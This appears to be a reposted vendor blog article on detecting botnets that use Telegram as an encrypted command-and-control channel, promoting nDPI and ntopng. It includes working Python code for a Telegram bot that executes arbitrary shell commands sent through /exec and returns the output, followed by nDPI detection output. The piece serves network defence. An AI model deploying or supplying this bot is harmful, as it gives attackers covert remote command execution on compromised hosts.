A botnet is a popular method for running malware on a network using a command and control paradigm. Popular protocols used by botnets include IRC and HTTP. Most IDS can detect zombies if they are able to inspect network traffic. When zombie programs turn to encrypted and cloud-based protocols (i.e., those you cannot block with simple IP-based ACLs), it becomes a blind spot for network administrators. The popular Telegram messaging system allows people to create a botnet in minutes, as shown in the code snippet below:
bot = Bot(token)
def run():
""" Runs the function used to start the bot.
"""
MessageLoop(bot,
{ 'chat': on_chat_message }
).run_as_thread()
print('Listening ...')
while 1:
time.sleep(10)
##
def help(bot, chat_id):
bot.sendMessage(chat_id, 'Available commands:')
bot.sendMessage(chat_id, '/exec Execute remote command')
##
def run_command(command):
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.stdout.read().decode('utf-8')
##
def on_chat_message(msg):
""" Manages the predefined commands of the telegram bot.
:param msg: message received from telegram.
"""
#print(msg)
content_type, chat_type, chat_id = glance(msg)
#
# Check if the content_type of the message is a text
if content_type == 'text':
txt = msg['text'].lower()
#
# Switch construct to manage the various commands
if txt.startswith("/exec"):
cmd = txt[6:]
bot.sendMessage(chat_id, 'Executing command ['+cmd+']...')
bot.sendMessage(chat_id, run_command(cmd.split(' ')))
else:
help(bot, chat_id)
run()As you can see, you can initiate a botnet on a remote system and execute arbitrary commands.
Suppose now that one of your colleagues lets this simple botnet run behind the network. The firewall would treat this traffic as port 443 or similar TLS traffic and let it pass.
From the diagram above, you can see that this Telegram traffic appears to be like TLS, but it is not TLS, and you can leverage detection aspects like certificates and JA3. You can imagine the consequences of running these simple tools on the network. Essentially, your network is exposed, and the firewall or popular non-DPI-based IDS like Suricata or Zeek can’t do anything about it.
Fortunately, nDPI can detect it
Detected protocols:
Telegram packets: 156 bytes: 44034 flows: 2
Protocol statistics:
Acceptable 44034 bytes
1 TCP 192.168.1.110:52671 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][76 pkts/9307 bytes <-> 74 pkts/33973 bytes][Goodput ratio: 46/86][3.75 sec][bytes ratio: -0.570 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 58/59 1817/1852 264/272][Pkt Len c2s/s2c min/avg/max/stddev: 66/70 122/459 846/1294 133/446]
2 TCP 192.168.1.110:52672 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][4 pkts/445 bytes <-> 2 pkts/309 bytes][Goodput ratio: 38/55][0.07 sec][bytes ratio: 0.180 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/36 23/36 35/36 16/0][Pkt Len c2s/s2c min/avg/max/stddev: 66/74 111/154 235/235 72/80]So all our ntop tools (like ntopng, nprobe…) can address this issue. Now that you realize you’re not invincible anymore, you have two options:
- Visibility (e.g., using ntopng)
- Use ntopng Edge to block this traffic.
In ntopng, you can specify what protocols a device can run.
Thus, you can alert when unwanted protocols are run on critical hosts, such as servers, which includes all protocols supported by nDPI, thus including Telegram.
If you want to see more security-oriented alerts, you can customize user scripts and enable behavior checks that interest you.
We hope this helps you keep your network secure and that network administrators are no longer blind.
Original Declaration: This article is authorized by the author for publication by the Tencent Cloud Developer Community. Reprinting is not allowed without permission.
If there is any infringement, please contact [email protected] for deletion.
ddosDDoS ProtectionNetwork Asset Risk Monitoring SystemEnterprise OrganizationMobile Application Security